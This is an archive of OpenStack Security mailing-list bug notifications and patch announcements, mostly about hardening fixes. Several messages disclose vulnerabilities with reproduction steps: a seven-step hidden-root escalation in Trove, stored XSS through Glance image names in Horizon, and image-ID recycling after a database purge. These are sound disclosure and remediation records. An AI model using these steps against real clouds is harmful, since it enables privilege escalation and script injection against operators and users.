From 1541122 at bugs.launchpad.net Thu Sep 1 08:52:34 2016 From: 1541122 at bugs.launchpad.net (OpenStack Infra) Date: Thu, 01 Sep 2016 08:52:34 -0000 Subject: [Openstack-security] [Bug 1541122] Fix included in openstack/sahara 5.0.0.0b3 References: <20160202222341.14647.37585.malonedeb@gac.canonical.com> Message-ID: <20160901085234.18113.37707.malone@chaenomeles.canonical.com> This issue was fixed in the openstack/sahara 5.0.0.0b3 development milestone. -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1541122 Title: Vanilla plugin uses hardcoded password for Oozie MySQL database user Status in OpenStack Security Advisory: Won't Fix Status in Sahara: Fix Released Bug description: When deploying clusters with the vanilla plugin, the Oozie[1] application must be configured to use a database for storing data related to the scheduling, running, and processing of Hadoop jobs. Oozie is the primary scheduler for jobs entering the Hadoop ecosystem through the vanilla plugin. Sahara configures the credentials for Oozie to access its database; this can be seen in sahara/plugins/vanilla/hadoop2/oozie_helper.py [2]. These credentials are hardcoded, and use a weak password. An intruder with access to the nodes of a cluster that is created by sahara with the vanilla plugin will have access to the database that backs the Oozie installation. With this access, the intruder could change the operational effects of Oozie to produce results other than expected, for example inserting new jobs or altering configurations associated with currently running jobs. As sahara has ultimate control over the deployment and configuration of Oozie on nodes deployed in its clusters, this hardcoded password should be changed in favor of a random password that will be generated uniquely for each deployed cluster. Oozie uses the values associated with the configurations defined in [2] to create the credentials; this means that the change should be a matter of simply changing the source value of the password for the Oozie user. [1]: https://oozie.apache.org/ [2]: https://github.com/openstack/sahara/blob/master/sahara/plugins/vanilla/hadoop2/oozie_helper.py#L41 To manage notifications about this bug go to: https://bugs.launchpad.net/ossa/+bug/1541122/+subscriptions From 1619039 at bugs.launchpad.net Sun Sep 4 02:26:43 2016 From: 1619039 at bugs.launchpad.net (OpenStack Infra) Date: Sun, 04 Sep 2016 02:26:43 -0000 Subject: [Openstack-security] [Bug 1619039] Re: Logging of martian packets should be configurable References: <20160831203607.4213.54281.malonedeb@wampee.canonical.com> Message-ID: <20160904022643.16161.35084.malone@soybean.canonical.com> Reviewed: https://review.openstack.org/363933 Committed: https://git.openstack.org/cgit/openstack/openstack-ansible-security/commit/?id=e58ae245ad8bc334cc75ef648d3fcbe73bbbf648 Submitter: Jenkins Branch: master commit e58ae245ad8bc334cc75ef648d3fcbe73bbbf648 Author: Major Hayden Date: Wed Aug 31 15:54:48 2016 -0500 Disable martian logging by default This patch disables martian packet logging and updates the documentation to reflect the new default. A release note is also included to make deployers aware of the change. Closes-bug: 1619039 Change-Id: I4b19aa1200298a92c85824e319bb919260e5a6d0 ** Changed in: openstack-ansible Status: In Progress => Fix Released -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack.
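Returning to the sahara fix announced above (bug 1541122): the remediation it calls for, a random password generated uniquely for each deployed cluster, can be sketched in a few lines. This is a minimal illustration that assumes invented helper names rather than the actual oozie_helper.py code; the two JDBC property names are standard Oozie configuration keys.

    # Minimal sketch, not the actual sahara code: generate the Oozie database
    # password once per cluster instead of using a hardcoded literal.
    import secrets

    def generate_oozie_db_password():
        # One random value per deployed cluster; stored wherever the cluster's
        # generated credentials are kept (assumption for illustration).
        return secrets.token_urlsafe(32)

    def get_oozie_mysql_configs(password):
        # Standard Oozie JPAService JDBC properties; the password argument is
        # the per-cluster random value rather than a fixed string.
        return {
            'oozie.service.JPAService.jdbc.username': 'oozie',
            'oozie.service.JPAService.jdbc.password': password,
        }

The important property is simply that the value differs per cluster and never appears in the source tree.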
https://bugs.launchpad.net/bugs/1619039 Title: Logging of martian packets should be configurable Status in openstack-ansible: Fix Released Bug description: The martian logging should be tunable. When neutron uses Linux bridging for networking, lots of martian packets will be logged. This logging isn't useful and can fill up a syslog server quickly. To manage notifications about this bug go to: https://bugs.launchpad.net/openstack-ansible/+bug/1619039/+subscriptions From 1617343 at bugs.launchpad.net Sun Sep 4 02:28:06 2016 From: 1617343 at bugs.launchpad.net (OpenStack Infra) Date: Sun, 04 Sep 2016 02:28:06 -0000 Subject: [Openstack-security] [Bug 1617343] Re: AIDE should not look at changes in /run References: <20160826141422.16089.54915.malonedeb@soybean.canonical.com> Message-ID: <20160904022806.14682.7205.malone@wampee.canonical.com> Reviewed: https://review.openstack.org/362830 Committed: https://git.openstack.org/cgit/openstack/openstack-ansible-security/commit/?id=e7373c4985ae8f4921b54002e2416554cb0da200 Submitter: Jenkins Branch: liberty commit e7373c4985ae8f4921b54002e2416554cb0da200 Author: Major Hayden Date: Fri Aug 26 09:17:18 2016 -0500 Exclude /run from AIDE checks The /run directory contains items that change frequently and often change when services start/stop or the system reboots. This patch excludes the /run directory from AIDE checks. Closes-bug: 1617343 Backport-of: Ic915d4821c8a90c613c5822c6d54c2f7ab54da16 Change-Id: Ib74d6ec24991039299b3ad2c2d550f488fc463ba ** Tags added: in-liberty -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1617343 Title: AIDE should not look at changes in /run Status in openstack-ansible: Fix Released Bug description: AIDE shouldn't be wandering into /run since things there only live temporarily. --------------------------------------------------- Changed entries: --------------------------------------------------- d =.... mc.. .. .: /etc/apparmor.d/libvirt d =.... mc.. .. .: /etc/libvirt/qemu d =.... mc.. .. .: /root f >b... mc..C.. .: /root/.bash_history f >.... mc..C.. .: /root/.ssh/known_hosts f >b... mci.C.. .: /root/.viminfo f =.... mci.C.. : /run/motd.dynamic d >.... mc.. .. : /run/shm f =.... ....C.. : /run/shm/spice.29052 d =.... mc.. .. : /run/systemd/sessions d =.... mc.. .. : /run/systemd/users f =.... mci.C.. : /run/systemd/users/0 d >.... . .. : /run/udev/data d =.... mc.. .. : /run/user To manage notifications about this bug go to: https://bugs.launchpad.net/openstack-ansible/+bug/1617343/+subscriptions From 1616281 at bugs.launchpad.net Sun Sep 4 02:27:59 2016 From: 1616281 at bugs.launchpad.net (OpenStack Infra) Date: Sun, 04 Sep 2016 02:27:59 -0000 Subject: [Openstack-security] [Bug 1616281] Re: Can't initialize AIDE during subsequent playbook runs References: <20160824023003.4754.11744.malonedeb@gac.canonical.com> Message-ID: <20160904022759.4914.83298.malone@wampee.canonical.com> Reviewed: https://review.openstack.org/362828 Committed: https://git.openstack.org/cgit/openstack/openstack-ansible-security/commit/?id=6c9eb50fd64cb791a73ef778315f9a52b8c434c8 Submitter: Jenkins Branch: liberty commit 6c9eb50fd64cb791a73ef778315f9a52b8c434c8 Author: Major Hayden Date: Mon Aug 29 11:11:09 2016 -0500 Ensure AIDE initializes on subsequent runs If a deployer installs AIDE the first time they apply the role without initializing AIDE and they want to initialize it later, the handler that does the initialization never fires. 
This patch does a few things: - Ensures AIDE initialization if the initialize_aide bool is True - Doesn't intialize the AIDE db if it already exists - Moves the new db into place on Red Hat systems - Moves the AIDE tasks into its own file with tags - Prevents AIDE from trawling through /var Manual backport of two reviews: * https://review.openstack.org/#/c/359554/ * https://review.openstack.org/#/c/361460/ Closes-Bug: 1616281 Backport-of: I170eb3898b4336333b1fbe663ec4f069823898e0 Change-Id: Iaedcce1d6416f2224f44376336c23702e6152a00 ** Tags added: in-liberty -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1616281 Title: Can't initialize AIDE during subsequent playbook runs Status in openstack-ansible: Fix Released Bug description: AIDE isn't initialized by default because it can cause a lot of system load when it does its first check of a new system. If a deployer applies the security hardening role with ``initialize_aide`` set to False (the default), it won't be initialized. However, if they set it to True and re-run the playbook, AIDE is already configured and the handler to initialize AIDE won't execute. To manage notifications about this bug go to: https://bugs.launchpad.net/openstack-ansible/+bug/1616281/+subscriptions From 1619039 at bugs.launchpad.net Tue Sep 6 15:25:19 2016 From: 1619039 at bugs.launchpad.net (OpenStack Infra) Date: Tue, 06 Sep 2016 15:25:19 -0000 Subject: [Openstack-security] [Bug 1619039] Fix proposed to openstack-ansible-security (stable/mitaka) References: <20160831203607.4213.54281.malonedeb@wampee.canonical.com> Message-ID: <20160906152519.3952.62807.malone@wampee.canonical.com> Fix proposed to branch: stable/mitaka Review: https://review.openstack.org/366203 -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1619039 Title: Logging of martian packets should be configurable Status in openstack-ansible: Fix Released Bug description: The martian logging should be tunable. When neutron uses Linux bridging for networking, lots of martian packets will be logged. This logging isn't useful and can fill up a syslog server quickly. To manage notifications about this bug go to: https://bugs.launchpad.net/openstack-ansible/+bug/1619039/+subscriptions From 1619039 at bugs.launchpad.net Tue Sep 6 15:25:36 2016 From: 1619039 at bugs.launchpad.net (OpenStack Infra) Date: Tue, 06 Sep 2016 15:25:36 -0000 Subject: [Openstack-security] [Bug 1619039] Fix proposed to openstack-ansible-security (liberty) References: <20160831203607.4213.54281.malonedeb@wampee.canonical.com> Message-ID: <20160906152536.13185.27465.malone@soybean.canonical.com> Fix proposed to branch: liberty Review: https://review.openstack.org/366204 -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1619039 Title: Logging of martian packets should be configurable Status in openstack-ansible: Fix Released Bug description: The martian logging should be tunable. When neutron uses Linux bridging for networking, lots of martian packets will be logged. This logging isn't useful and can fill up a syslog server quickly. 
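For deployers wondering which kernel knob is involved here: martian packet logging is controlled by the log_martians sysctl keys, so the role's new default amounts to settings along the lines below. This is a sketch using the stock kernel key names; the role's own variable names are not shown in this thread.

    # Illustrative /etc/sysctl.d/ snippet; 0 disables martian packet logging.
    net.ipv4.conf.all.log_martians = 0
    net.ipv4.conf.default.log_martians = 0

Deployers who still want the logging can set these keys (or the corresponding role variable) to 1 and reload with sysctl --system.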
To manage notifications about this bug go to: https://bugs.launchpad.net/openstack-ansible/+bug/1619039/+subscriptions From 1514569 at bugs.launchpad.net Tue Sep 6 17:36:11 2016 From: 1514569 at bugs.launchpad.net (Amrith) Date: Tue, 06 Sep 2016 17:36:11 -0000 Subject: [Openstack-security] [Bug 1514569] Re: Fix Postgres root-enable References: <20151109195235.21620.71031.malonedeb@soybean.canonical.com> Message-ID: <20160906173613.32623.73245.launchpad@gac.canonical.com> ** Changed in: trove Status: Fix Committed => Fix Released -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1514569 Title: Fix Postgres root-enable Status in OpenStack DBaaS (Trove): Fix Released Bug description: Fix PostgreSQL root functions The default PostgreSQL administration account is 'postgres'. In the current implementation Trove uses the 'postgres' account and returns a new superuser called 'root' when root access is requested. The user 'root' has, however, no special meaning in PostgreSQL, and existing applications may rely on the default superuser name 'postgres'. Trove should be using its own administrative account (os_admin) instead. Notes: The current implementation is broken for various reasons: - It uses UUIDs in place of a 'secure' password. - It creates a 'root' user, but no database for it. The clients won't be able to authenticate without explicitly providing an existing database name. - The created 'root' user has no 'SUPERUSER' attribute and hence is not a real superuser (cannot perform certain tasks)... - The implementation suffers a defect that allows a non-root user to gain root access to an instance without marking it as 'root-enabled' A similar defect exists in other datastores (MySQL) too: 1. Create an instance. 2. Enable root. 3. Use your root access to change the password of the built-in 'postgres' account (Trove will still work because it uses the 'peer' authentication method - the UNIX account). 4. Login as 'postgres' using the changed password and drop the created 'root' account. 5. Backup & restore the instance. 6. Trove reports that root has never been enabled (it checks for existence of superuser accounts other than the built-in 'postgres'). 7. You enjoy the root access of the 'postgres' user (the password is not reset on restore). To manage notifications about this bug go to: https://bugs.launchpad.net/trove/+bug/1514569/+subscriptions From 1619039 at bugs.launchpad.net Wed Sep 7 14:26:56 2016 From: 1619039 at bugs.launchpad.net (OpenStack Infra) Date: Wed, 07 Sep 2016 14:26:56 -0000 Subject: [Openstack-security] [Bug 1619039] Re: Logging of martian packets should be configurable References: <20160831203607.4213.54281.malonedeb@wampee.canonical.com> Message-ID: <20160907142656.306.27621.malone@gac.canonical.com> Reviewed: https://review.openstack.org/366204 Committed: https://git.openstack.org/cgit/openstack/openstack-ansible-security/commit/?id=31a8ff54d7ad8798b2a3dc5eb517bedd03e04592 Submitter: Jenkins Branch: liberty commit 31a8ff54d7ad8798b2a3dc5eb517bedd03e04592 Author: Major Hayden Date: Wed Aug 31 15:54:48 2016 -0500 Disable martian logging by default This patch disables martian packet logging and updates the documentation to reflect the new default. A release note is also included to make deployers aware of the change.
Manual-backport-of: I4b19aa1200298a92c85824e319bb919260e5a6d0 Closes-bug: 1619039 Change-Id: I10476844810421587455e263afb173f8b868c261 ** Tags added: in-liberty ** Tags added: in-stable-mitaka -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1619039 Title: Logging of martian packets should be configurable Status in openstack-ansible: Fix Released Bug description: The martian logging should be tunable. When neutron uses Linux bridging for networking, lots of martian packets will be logged. This logging isn't useful and can fill up a syslog server quickly. To manage notifications about this bug go to: https://bugs.launchpad.net/openstack-ansible/+bug/1619039/+subscriptions From 1619039 at bugs.launchpad.net Wed Sep 7 14:28:28 2016 From: 1619039 at bugs.launchpad.net (OpenStack Infra) Date: Wed, 07 Sep 2016 14:28:28 -0000 Subject: [Openstack-security] [Bug 1619039] Fix merged to openstack-ansible-security (stable/mitaka) References: <20160831203607.4213.54281.malonedeb@wampee.canonical.com> Message-ID: <20160907142828.11827.66372.malone@chaenomeles.canonical.com> Reviewed: https://review.openstack.org/366203 Committed: https://git.openstack.org/cgit/openstack/openstack-ansible-security/commit/?id=775f641513dbccbb9e73a955082bacf0c76ede66 Submitter: Jenkins Branch: stable/mitaka commit 775f641513dbccbb9e73a955082bacf0c76ede66 Author: Major Hayden Date: Wed Aug 31 15:54:48 2016 -0500 Disable martian logging by default This patch disables martian packet logging and updates the documentation to reflect the new default. A release note is also included to make deployers aware of the change. Manual-backport-of: I4b19aa1200298a92c85824e319bb919260e5a6d0 Closes-bug: 1619039 Change-Id: I10476844810421587455e263afb173f8b868c261 -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1619039 Title: Logging of martian packets should be configurable Status in openstack-ansible: Fix Released Bug description: The martian logging should be tunable. When neutron uses Linux bridging for networking, lots of martian packets will be logged. This logging isn't useful and can fill up a syslog server quickly. To manage notifications about this bug go to: https://bugs.launchpad.net/openstack-ansible/+bug/1619039/+subscriptions From major at mhtx.net Mon Sep 12 16:29:06 2016 From: major at mhtx.net (Major Hayden) Date: Mon, 12 Sep 2016 16:29:06 -0000 Subject: [Openstack-security] [Bug 1622674] [NEW] V-38540 doesn't include /etc/sysconfig/network Message-ID: <20160912162906.2515.64807.malonedeb@soybean.canonical.com> Public bug reported: V-38540 includes all of the Ubuntu network configuration paths, but it doesn't include /etc/sysconfig/network (used in CentOS/RHEL). ** Affects: openstack-ansible Importance: Low Assignee: Major Hayden (rackerhacker) Status: New ** Tags: security -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1622674 Title: V-38540 doesn't include /etc/sysconfig/network Status in openstack-ansible: New Bug description: V-38540 includes all of the Ubuntu network configuration paths, but it doesn't include /etc/sysconfig/network (used in CentOS/RHEL). 
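For reference, an audit watch for that path typically looks like the rule below; this is a hedged sketch with an assumed rule key, not necessarily the exact rule the role generates.

    # Illustrative auditd rule: watch /etc/sysconfig/network for writes and
    # attribute changes; the key name is an assumption for this example.
    -w /etc/sysconfig/network -p wa -k audit_network_modifications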
To manage notifications about this bug go to: https://bugs.launchpad.net/openstack-ansible/+bug/1622674/+subscriptions From 1622674 at bugs.launchpad.net Mon Sep 12 17:46:00 2016 From: 1622674 at bugs.launchpad.net (OpenStack Infra) Date: Mon, 12 Sep 2016 17:46:00 -0000 Subject: [Openstack-security] [Bug 1622674] Re: V-38540 doesn't include /etc/sysconfig/network References: <20160912162906.2515.64807.malonedeb@soybean.canonical.com> Message-ID: <20160912174600.11954.82051.malone@gac.canonical.com> Fix proposed to branch: master Review: https://review.openstack.org/368991 ** Changed in: openstack-ansible Status: New => In Progress -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1622674 Title: V-38540 doesn't include /etc/sysconfig/network Status in openstack-ansible: In Progress Bug description: V-38540 includes all of the Ubuntu network configuration paths, but it doesn't include /etc/sysconfig/network (used in CentOS/RHEL). To manage notifications about this bug go to: https://bugs.launchpad.net/openstack-ansible/+bug/1622674/+subscriptions From 1595669 at bugs.launchpad.net Mon Sep 12 19:28:08 2016 From: 1595669 at bugs.launchpad.net (OpenStack Infra) Date: Mon, 12 Sep 2016 19:28:08 -0000 Subject: [Openstack-security] [Bug 1595669] Re: Separate documentation for STIGs that aren't in Ansible References: <20160623190721.1729.88002.malonedeb@chaenomeles.canonical.com> Message-ID: <20160912192810.11876.1242.launchpad@gac.canonical.com> ** Changed in: openstack-ansible Status: Confirmed => In Progress -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1595669 Title: Separate documentation for STIGs that aren't in Ansible Status in openstack-ansible: In Progress Bug description: Create separate documentation for STIGs that aren't in Ansible To manage notifications about this bug go to: https://bugs.launchpad.net/openstack-ansible/+bug/1595669/+subscriptions From 1595669 at bugs.launchpad.net Tue Sep 13 10:01:48 2016 From: 1595669 at bugs.launchpad.net (OpenStack Infra) Date: Tue, 13 Sep 2016 10:01:48 -0000 Subject: [Openstack-security] [Bug 1595669] Re: Separate documentation for STIGs that aren't in Ansible References: <20160623190721.1729.88002.malonedeb@chaenomeles.canonical.com> Message-ID: <20160913100148.12315.84130.malone@gac.canonical.com> Reviewed: https://review.openstack.org/368957 Committed: https://git.openstack.org/cgit/openstack/openstack-ansible-security/commit/?id=3c19f00a7f29d723c157e935651c7748ef0a8e7c Submitter: Jenkins Branch: master commit 3c19f00a7f29d723c157e935651c7748ef0a8e7c Author: Major Hayden Date: Mon Sep 12 14:07:16 2016 -0500 [Docs] Metadata cleanup This patch adds the right tags to each piece of metadata and corrects small errors found in the deployer notes. Closes-bug: 1595669 Change-Id: Ic04aaad85ebf111be5a0bdb01a350442fdea1433 ** Changed in: openstack-ansible Status: In Progress => Fix Released -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. 
https://bugs.launchpad.net/bugs/1595669 Title: Separate documentation for STIGs that aren't in Ansible Status in openstack-ansible: Fix Released Bug description: Create separate documentation for STIGs that aren't in Ansible To manage notifications about this bug go to: https://bugs.launchpad.net/openstack-ansible/+bug/1595669/+subscriptions From 1622674 at bugs.launchpad.net Wed Sep 14 02:02:45 2016 From: 1622674 at bugs.launchpad.net (OpenStack Infra) Date: Wed, 14 Sep 2016 02:02:45 -0000 Subject: [Openstack-security] [Bug 1622674] Re: V-38540 doesn't include /etc/sysconfig/network References: <20160912162906.2515.64807.malonedeb@soybean.canonical.com> Message-ID: <20160914020245.11804.61443.malone@gac.canonical.com> Reviewed: https://review.openstack.org/368991 Committed: https://git.openstack.org/cgit/openstack/openstack-ansible-security/commit/?id=c93b1676cca4d457f77aaff6a83b77faa419fbea Submitter: Jenkins Branch: master commit c93b1676cca4d457f77aaff6a83b77faa419fbea Author: Major Hayden Date: Mon Sep 12 14:51:58 2016 -0500 Add network conf auditing on CentOS This patch adds in auditing for /etc/sysconfig/network. Closes-bug: 1622674 Change-Id: I0de15a130161ed1f8a6bdb2a7de33c55b91d6609 ** Changed in: openstack-ansible Status: In Progress => Fix Released -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1622674 Title: V-38540 doesn't include /etc/sysconfig/network Status in openstack-ansible: Fix Released Bug description: V-38540 includes all of the Ubuntu network configuration paths, but it doesn't include /etc/sysconfig/network (used in CentOS/RHEL). To manage notifications about this bug go to: https://bugs.launchpad.net/openstack-ansible/+bug/1622674/+subscriptions From dklyle0 at gmail.com Wed Sep 14 19:31:18 2016 From: dklyle0 at gmail.com (David Lyle) Date: Wed, 14 Sep 2016 19:31:18 -0000 Subject: [Openstack-security] [Bug 1622690] Re: Potential XSS in image create modal or angular table References: <20160912171951.2128.2126.malonedeb@wampee.canonical.com> Message-ID: <20160914193120.2408.91491.launchpad@chaenomeles.canonical.com> ** Information type changed from Private Security to Public Security -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1622690 Title: Potential XSS in image create modal or angular table Status in OpenStack Dashboard (Horizon): Fix Committed Status in OpenStack Security Advisory: Won't Fix Bug description: This issue is being treated as a potential security risk under embargo. Please do not make any public mention of embargoed (private) security vulnerabilities before their coordinated publication by the OpenStack Vulnerability Management Team in the form of an official OpenStack Security Advisory. This includes discussion of the bug or associated fixes in public forums such as mailing lists, code review systems and bug trackers. Please also avoid private disclosure to other individuals not already approved for access to this information, and provide this same reminder to those who are made aware of the issue prior to publication. All discussion should remain confined to this private bug report, and any proposed fixes should be added to the bug as attachments. The Image Create modal allows you to create an image sending unencoded HTML and JavaScript. This could lead to a potential XSS attack Steps to reproduce: 1. Go to project>images 2. 
Click on "Create image" 3. In the "Image Name" input enter some HTML code or script code (i.e

an HTML element wrapping the text "This is bad"
, ) 4. Fill in other required fields 5. Click on 'Create Image' Expected Result: The image is created but the name is safely encoded and it's shown in the table as it was written Actual Result: The image name is not encoded an therefore is being rendered as HTML by the browser. To manage notifications about this bug go to: https://bugs.launchpad.net/horizon/+bug/1622690/+subscriptions From gerrit2 at review.openstack.org Wed Sep 14 21:11:22 2016 From: gerrit2 at review.openstack.org (gerrit2 at review.openstack.org) Date: Wed, 14 Sep 2016 21:11:22 +0000 Subject: [Openstack-security] [openstack/cinder] SecurityImpact review request change Id5f83f69fd3a877459fab924c005047e55f98c7b Message-ID: Hi, I'd like you to take a look at this patch for potential SecurityImpact. https://review.openstack.org/366750 Log: commit 7a75f49413d9ad0b4dc9696b126a96cee7023593 Author: Kaitlin Farr Date: Wed Sep 7 13:21:33 2016 -0400 Modifies override logic for key_manager Makes the logic for overriding config options for the key_manager more robust. Before this patch, the override logic seemed to be called before the global CONF object has been populated with values from the configuration file. ConfKeyManager, the default for if no value had been specified, would be used to override the value for api_class. Then when CONF was populated with the actual values, the ConfKeyManager override value would still be set. This patch makes the logic a little bit more robust so that the value is only overriden if explicitly passed into the function, not at the global scope outside of the function. SecurityImpact Closes-Bug: 1621109 Change-Id: Id5f83f69fd3a877459fab924c005047e55f98c7b From gerrit2 at review.openstack.org Thu Sep 15 13:42:37 2016 From: gerrit2 at review.openstack.org (gerrit2 at review.openstack.org) Date: Thu, 15 Sep 2016 13:42:37 +0000 Subject: [Openstack-security] [openstack/cinder] SecurityImpact review request change Id5f83f69fd3a877459fab924c005047e55f98c7b Message-ID: Hi, I'd like you to take a look at this patch for potential SecurityImpact. https://review.openstack.org/366750 Log: commit 43a7b56dd333615c00d6c794db4b45b6fe125b82 Author: Kaitlin Farr Date: Wed Sep 7 13:21:33 2016 -0400 Modifies override logic for key_manager Makes the logic for overriding config options for the key_manager more robust. Before this patch, the override logic seemed to be called before the global CONF object has been populated with values from the configuration file. ConfKeyManager, the default for if no value had been specified, would be used to override the value for api_class. Then when CONF was populated with the actual values, the ConfKeyManager override value would still be set. This patch makes the logic a little bit more robust so that the value is only overriden if explicitly passed into the function, not at the global scope outside of the function. SecurityImpact Closes-Bug: 1621109 Change-Id: Id5f83f69fd3a877459fab924c005047e55f98c7b From fungi at yuggoth.org Thu Sep 15 17:40:05 2016 From: fungi at yuggoth.org (Jeremy Stanley) Date: Thu, 15 Sep 2016 17:40:05 -0000 Subject: [Openstack-security] [Bug 1593799] Re: glance-manage db purge breaks image immutability promise References: <20160617171339.24588.32339.malonedeb@gac.canonical.com> Message-ID: <20160915174005.1477.32150.malone@wampee.canonical.com> Yes, ideally it should have been switched to public (and a bug tag of "security" added) prior to distributing the OSSN, so that those reading it could make use of the bug link it contained. 
I'll go ahead and do that now. ** Information type changed from Private Security to Public ** Tags added: security -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1593799 Title: glance-manage db purge breaks image immutability promise Status in Glance: Confirmed Status in OpenStack Security Advisory: Opinion Status in OpenStack Security Notes: Fix Released Bug description: This issue is being treated as a potential security risk under embargo. Please do not make any public mention of embargoed (private) security vulnerabilities before their coordinated publication by the OpenStack Vulnerability Management Team in the form of an official OpenStack Security Advisory. This includes discussion of the bug or associated fixes in public forums such as mailing lists, code review systems and bug trackers. Please also avoid private disclosure to other individuals not already approved for access to this information, and provide this same reminder to those who are made aware of the issue prior to publication. All discussion should remain confined to this private bug report, and any proposed fixes should be added to the bug as attachments. Using the glance-manage db purge command opens the possibility of recycling image IDs. When the row is deleted from the database the ID is not known by glance anymore and thus it's not unique during the deployment lifecycle. This opens the possibility of the following scenario: 1) End user boots VM from private/public/shared image. 2) Image owner deletes the image. 3) glance-manage db purge gets run, which deletes the record that the image ever existed. 4) Either a malicious user or someone unintentionally creates a new image with the same ID (being the same user and so having access to the image by owning it, or the image becoming public/shared (possibly community at some point)) 5) The same end user either boots a snapshot from the original image, or nova needs to migrate the VM to another host. Now the user's VM will be rebuilt on top of the new image. In the worst-case scenario the user has no idea that the image data changed in between. This behavior breaks Glance's image immutability promise, which states that the data related to an image ID that has gone active will never change. We have two solutions for this: either we introduce a table to track the deleted image IDs and have glance cross-check it during image create, or we leave it as is but document the implications of using the purge, transferring that responsibility to the cloud operators. This was partially discussed in the virtual glance midcycle meetup, so it might not be justified to leave this as private, but I wanted to leave that decision to the VMT.
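To make the first of those two options concrete, a tracking table plus a check at image create time could look roughly like the sketch below. The model, table, and function names are invented for illustration and are not taken from the glance schema or from any proposed patch.

    # Hypothetical sketch of the "track purged image IDs" option.
    from sqlalchemy import Column, DateTime, String
    from sqlalchemy.ext.declarative import declarative_base

    Base = declarative_base()

    class PurgedImageId(Base):
        __tablename__ = 'purged_image_ids'
        id = Column(String(36), primary_key=True)    # UUID of the purged image
        purged_at = Column(DateTime, nullable=False)

    def id_was_ever_used(session, image_id):
        # Image create would refuse an explicit ID for which this returns True,
        # preserving the promise that an active image ID never changes meaning.
        return session.query(PurgedImageId).filter_by(id=image_id).count() > 0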
To manage notifications about this bug go to: https://bugs.launchpad.net/glance/+bug/1593799/+subscriptions From fungi at yuggoth.org Fri Sep 16 00:45:11 2016 From: fungi at yuggoth.org (Jeremy Stanley) Date: Fri, 16 Sep 2016 00:45:11 -0000 Subject: [Openstack-security] [Bug 1623735] Re: Stored XSS in Glance Image Names References: <20160915005554.1628.91491.malonedeb@chaenomeles.canonical.com> Message-ID: <20160916004512.1895.73327.launchpad@soybean.canonical.com> *** This bug is a duplicate of bug 1622690 *** https://bugs.launchpad.net/bugs/1622690 ** Information type changed from Private Security to Public ** This bug has been marked a duplicate of bug 1622690 Potential XSS in image create modal or angular table ** Description changed: - This issue is being treated as a potential security risk under embargo. - Please do not make any public mention of embargoed (private) security - vulnerabilities before their coordinated publication by the OpenStack - Vulnerability Management Team in the form of an official OpenStack - Security Advisory. This includes discussion of the bug or associated - fixes in public forums such as mailing lists, code review systems and - bug trackers. Please also avoid private disclosure to other individuals - not already approved for access to this information, and provide this - same reminder to those who are made aware of the issue prior to - publication. All discussion should remain confined to this private bug - report, and any proposed fixes should be added to the bug as - attachments. - - -- - My team is currently testing Glance with the API security testing tool we've developed (https://github.com/openstack/syntribos), and in the course of testing I discovered a cross-site scripting issue in Horizon stemming from Glance image names. ========================= Request to Glance: POST /v2/images HTTP/1.1 Host: [GLANCE ENDPOINT] Connection: close Accept-Encoding: gzip, deflate Accept: application/json User-Agent: python-requests/2.11.1 Content-Type: application/json X-Auth-Token: [TOKEN] Content-Length: 207 {"protected": false, "name": "", "tags": ["testing"], "container_format": "bare", "disk_format": "raw", "id": "0b8b0e0d-0ed2-4628-b25d-3e8ce239f6de", "visibility": "private"} HTTP/1.1 201 Created Content-Length: 585 Content-Type: application/json; charset=UTF-8 Location: http://[GLANCE ENDPOINT]/v2/images/0b8b0e0d-0ed2-4628-b25d-3e8ce239f6de X-Openstack-Request-Id: req-e7150b2a-9a52-44a0-bd8d-1663dfc95524 Date: Thu, 15 Sep 2016 00:26:57 GMT Connection: close {"status": "queued", "name": "", "tags": ["testing"], "container_format": "bare", "created_at": "2016-09-15T00:26:57Z", "size": null, "disk_format": "raw", "updated_at": "2016-09-15T00:26:57Z", "visibility": "private", "self": "/v2/images/0b8b0e0d-0ed2-4628-b25d-3e8ce239f6de", "min_disk": 0, "protected": false, "id": "0b8b0e0d-0ed2-4628-b25d-3e8ce239f6de", "file": "/v2/images/0b8b0e0d-0ed2-4628-b25d-3e8ce239f6de/file", "checksum": null, "owner": "823c88c894af4aafa0b8f12d2eb8f1be", "virtual_size": null, "min_ram": 0, "schema": "/v2/schemas/image"} ========================= This will percolate into Horizon's list view of Glance images (/admin/images), and result in an alert box popping up (see attached screenshot). -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. 
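The general defense against this class of bug is output encoding: any value that originated as user input, such as a Glance image name, has to be escaped before it is rendered as markup. The snippet below is a generic Python illustration of that principle, not the actual Horizon fix, which lives in its AngularJS templates.

    # Generic illustration of output encoding for untrusted strings.
    import html

    def render_image_name_cell(image_name):
        # html.escape converts <, >, &, and quotes into entities, so a name
        # like "<script>...</script>" is displayed as text instead of executing.
        return '<td>{}</td>'.format(html.escape(image_name, quote=True))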
